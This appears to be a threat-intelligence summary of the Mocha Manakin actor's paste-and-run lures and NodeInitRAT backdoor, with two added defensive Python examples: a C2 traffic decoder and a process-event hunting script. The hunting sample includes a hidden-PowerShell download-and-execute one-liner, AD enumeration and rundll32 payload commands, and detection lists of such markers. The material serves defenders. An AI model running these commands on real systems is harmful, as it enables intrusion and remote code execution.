Full Report
Mocha Manakin, believed to have ties to Interlock ransomware operations, has been observed using the paste-and-run phishing technique for initial access since at least January 2025. Adversaries deploy a custom NodeJS backdoor, dubbed NodeInitRAT, which enables persistence, reconnaissance, command execution, and payload delivery via HTTP, along with other offensive operations that can potentially lead to […] The post Mocha Manakin Attack Detection: Hackers Spread a Custom NodeJS Backdoor Dubbed NodeInitRAT Using the Paste-and-Run Technique appeared first on SOC Prime.
Analysis Summary
# Threat Actor: Mocha Manakin
## Attribution & Identity
The threat actor is tracked as **Mocha Manakin**. The activity discussed centres on a custom Node.js backdoor named **NodeInitRAT**. The source states that Mocha Manakin is believed to have ties to **Interlock ransomware** operations; this is an assessment based on shared characteristics, not a confirmed attribution.
## Activity Summary
Mocha Manakin gains initial access with a "paste-and-run" lure, in which the victim is tricked into pasting and running an attacker-supplied command, and that command ultimately installs the custom **NodeInitRAT** backdoor written in Node.js. The backdoor then beacons to its command-and-control (C2) server over HTTP. Through it the actor runs arbitrary commands to perform Active Directory reconnaissance, specifically enumerating domain controllers, domain trusts, domain administrators and administrative shares, and Service Principal Names (SPNs). After enumeration, the actor delivers secondary payloads, including EXE, DLL, and JS files.
## Tactics, Techniques & Procedures
- **Initial Access/Execution:** Uses a "paste-and-run" lure (the same pattern widely tracked as ClickFix): the user is persuaded to paste an attacker-supplied command into the Windows Run dialog (Win+R) or a similar prompt and execute it, so the first malicious process is started by the user, under the user's own privileges, with no exploit involved.
- **Command and Control (C2):** NodeInitRAT communicates with its C2 servers over **HTTP**.
- **Command and Control/Defense Evasion:** C2 request and response bodies are obfuscated with **XOR encoding and GZIP compression**, so they do not appear as plaintext on the wire even though the transport is unencrypted HTTP.
- **Discovery:** Executes commands to enumerate domain controllers, domain trusts, domain administrators, and SPNs.
- **Execution/Persistence:** NodeInitRAT provides persistence and delivers additional payloads (EXE, DLL, JS) for follow-on activity; lateral movement is not described explicitly in the source.
- *No specific MITRE ATT&CK IDs were explicitly mentioned in the provided text.*
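The XOR-plus-GZIP wrapping noted above is what an analyst has to undo before a captured NodeInitRAT HTTP body can be read. The following is an added example, not code from SOC Prime or from the actor's tooling: it assumes a single-byte XOR key (the real key length, key value and layer order are not given on this page) and tries both layer orders, using the gzip header as the oracle for one order and a JSON-parse check for the other. The sample beacon body and the key 0x5A are constructed for the demonstration.

```python
"""Recover the plaintext of a captured C2 body that was XOR-encoded and
GZIP-compressed. Added example; the real NodeInitRAT key, key length and
layer order are not given on the page, so a single-byte key is assumed."""
import gzip
import json
import zlib

GZIP_MAGIC = b"\x1f\x8b"


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data against a repeating key."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def looks_like_json(data: bytes) -> bool:
    """Assumption: beacon plaintext is JSON text, as is usual for a Node.js backdoor."""
    try:
        json.loads(data.decode("utf-8"))
        return True
    except ValueError:  # covers UnicodeDecodeError and JSONDecodeError
        return False


def decode_c2_body(body: bytes, validate=looks_like_json):
    """Return (layer_order, key, plaintext), or None if no candidate works.

    'xor-then-gzip': the sender XORed the plaintext and then gzipped it, so
    the body itself carries the gzip magic. Decompress, then take the first
    single-byte key whose output passes `validate`.

    'gzip-then-xor': the sender gzipped first and XORed the stream. Undo the
    XOR with every single-byte key and accept the one that restores the gzip
    magic and decompresses cleanly. A key of 0x00 on this path means the body
    was plain gzip with no XOR layer detected.
    """
    if body[:2] == GZIP_MAGIC:
        try:
            inner = gzip.decompress(body)
        except (OSError, EOFError, zlib.error):
            inner = None
        if inner is not None:
            for k in range(256):
                key = bytes([k])
                candidate = xor_bytes(inner, key)
                if validate(candidate):
                    return ("xor-then-gzip", key, candidate)

    for k in range(256):
        key = bytes([k])
        stripped = xor_bytes(body, key)
        if stripped[:2] != GZIP_MAGIC:
            continue
        try:
            return ("gzip-then-xor", key, gzip.decompress(stripped))
        except (OSError, EOFError, zlib.error):
            continue
    return None


# Constructed sample traffic (not real NodeInitRAT data): one beacon body
# wrapped each way with the single-byte key 0x5A.
SAMPLE_PLAINTEXT = b'{"host":"WS01","user":"jdoe","result":"dclist ok"}'
SAMPLE_KEY = b"\x5a"
SAMPLE_GZIP_THEN_XOR = xor_bytes(gzip.compress(SAMPLE_PLAINTEXT), SAMPLE_KEY)
SAMPLE_XOR_THEN_GZIP = gzip.compress(xor_bytes(SAMPLE_PLAINTEXT, SAMPLE_KEY))

if __name__ == "__main__":
    for label, body in (("gzip-then-xor", SAMPLE_GZIP_THEN_XOR),
                        ("xor-then-gzip", SAMPLE_XOR_THEN_GZIP)):
        print(label, "->", decode_c2_body(body))
```

Because the gzip magic is only two bytes, the `gzip-then-xor` path is unambiguous for a single-byte key (exactly one key restores both bytes), whereas the `xor-then-gzip` path needs a content check; swap in a different `validate` if the bodies you capture are not JSON, and extend the key loop if a multi-byte key is in play.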
## Targeting
- Sectors: Not explicitly detailed, but the focus on domain controllers and trusts suggests targeting of enterprise networks.
- Geography: Not specified.
- Victims: Specific organizations were not mentioned.
## Tools & Infrastructure
- **Malware families used:**
- **NodeInitRAT** (Custom NodeJS Backdoor)
- **Infrastructure:**
- C2 communications occur over **HTTP**.
- Specific C2 domains and IPs are not listed; the source only advises that defenders block or sinkhole those associated with NodeInitRAT.
## Implications
Paste-and-run delivery means the first malicious process is launched by the user, runs with the user's privileges, and needs no exploit, which sidesteps exploit-focused controls and shortens the path from lure to backdoor. The Active Directory enumeration (domain controllers, trusts, administrators, SPNs) points to high-value objectives such as privilege escalation and domain-wide ransomware deployment, consistent with the assessed ties to Interlock ransomware operations.
## Mitigations
- **Endpoint Defense:**
- Terminate any suspicious `node.exe` processes (for example, a Node.js runtime running from a user-writable directory rather than a standard install, or spawning Active Directory enumeration commands).
- Delete associated payloads (DLLs, etc.).
- Remove persistence mechanisms deployed by the actor.
- **System Configuration:**
- Disable the Windows+R and Windows+X hotkeys via Group Policy to remove the quickest paste-and-run execution path; note that this does not stop a pasted command from being run through other routes (a terminal, the File Explorer address bar) and may impact user workflows.
- **Network Defense:**
- Block or sinkhole any C2 domains and IPs associated with NodeInitRAT.
- Monitor DNS and HTTP proxy/traffic logs for the actor's C2 patterns; because the C2 runs over plain HTTP, the XOR/GZIP-obfuscated request bodies are visible to inspecting proxies and can be hunted on.
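Turning the endpoint mitigations above into a hunting pass: the following is an added example (not SOC Prime or vendor code) that runs four rules over constructed Sysmon-style process-creation events, looking for a Run-dialog download cradle, `node.exe` outside its stock install directory, `node.exe` spawning Active Directory discovery tools, and `node.exe` launching a dropped payload. The tool names, paths and command-line markers in the rule sets are assumptions about typical tradecraft, not indicators taken from the report; field names follow Sysmon Event ID 1.

```python
"""Detection pass for the paste-and-run -> node.exe -> AD discovery chain.
Added example, not SOC Prime or vendor code. Field names follow Sysmon
Event ID 1 (Image, ParentImage, CommandLine); every list below is an
assumption about typical tradecraft, not an indicator from the report."""
import json
from pathlib import PureWindowsPath

# Assumption: a stock Node.js install lives here; anything else deserves a look.
EXPECTED_NODE_DIR = "c:\\program files\\nodejs\\"
# Assumption: tools an operator would call to list DCs, trusts, admin groups and SPNs.
AD_DISCOVERY_TOOLS = {"nltest.exe", "net.exe", "net1.exe", "setspn.exe", "dsquery.exe"}
# Assumption: living-off-the-land loaders used to run a dropped DLL.
DLL_LOADERS = {"rundll32.exe", "regsvr32.exe"}
# Assumption: markers of a pasted one-liner that fetches and runs remote code.
CRADLE_MARKERS = ("http://", "https://", "iex", "invoke-expression",
                  "downloadstring", "curl ", "wget ")
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "node.exe"}
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\public\\")


def _name(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def evaluate(event: dict) -> list:
    """Return the names of the rules a single process-creation event matches."""
    image = event.get("Image", "")
    name = _name(image)
    parent = _name(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "").lower()
    hits = []

    # Rule 1: a shell launched straight from the Run dialog (explorer.exe is
    # the parent) whose command line looks like a download-and-execute one-liner.
    if parent == "explorer.exe" and name in SHELLS and any(m in cmd for m in CRADLE_MARKERS):
        hits.append("run_dialog_cradle")

    # Rule 2: node.exe running from somewhere other than the stock install.
    if name == "node.exe" and not image.lower().startswith(EXPECTED_NODE_DIR):
        hits.append("node_outside_install_dir")

    # Rule 3: the backdoor's reconnaissance commands appear as node.exe children.
    if parent == "node.exe" and name in AD_DISCOVERY_TOOLS:
        hits.append("node_spawns_ad_discovery")

    # Rule 4: a secondary payload (DLL via a loader, or an EXE dropped to a
    # user-writable path) launched by node.exe.
    if parent == "node.exe" and (name in DLL_LOADERS
                                 or any(d in image.lower() for d in USER_WRITABLE)):
        hits.append("node_spawns_payload")
    return hits


def hunt(jsonl: str) -> list:
    """Run every rule over JSON-lines events; return (index, image name, hits) per match."""
    results = []
    for i, line in enumerate(jsonl.splitlines()):
        if not line.strip():
            continue
        event = json.loads(line)
        hits = evaluate(event)
        if hits:
            results.append((i, _name(event.get("Image", "")), hits))
    return results


# Constructed sample telemetry: four events from the chain the page describes,
# followed by two benign ones. Paths, host names and the .invalid URL are made up.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "curl http://example.invalid/v | iex"'},
    {"ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Users\jdoe\AppData\Local\Temp\node\node.exe",
     "CommandLine": r"node.exe C:\Users\jdoe\AppData\Local\Temp\node\init.js"},
    {"ParentImage": r"C:\Users\jdoe\AppData\Local\Temp\node\node.exe",
     "Image": r"C:\Windows\System32\nltest.exe",
     "CommandLine": "nltest /domain_trusts"},
    {"ParentImage": r"C:\Users\jdoe\AppData\Local\Temp\node\node.exe",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Users\jdoe\AppData\Local\Temp\upd.dll,#1"},
    {"ParentImage": r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe",
     "Image": r"C:\Program Files\nodejs\node.exe",
     "CommandLine": r"node C:\dev\app\server.js"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe"},
])

if __name__ == "__main__":
    for index, image, hits in hunt(SAMPLE_EVENTS):
        print(f"event {index}: {image} -> {', '.join(hits)}")
```

Rules 3 and 4 are the high-confidence ones, since a Node.js runtime has little reason to spawn `nltest.exe` or `rundll32.exe`; rules 1 and 2 will need tuning against developer workstations, where a non-standard Node.js path (version managers, Electron apps) is common.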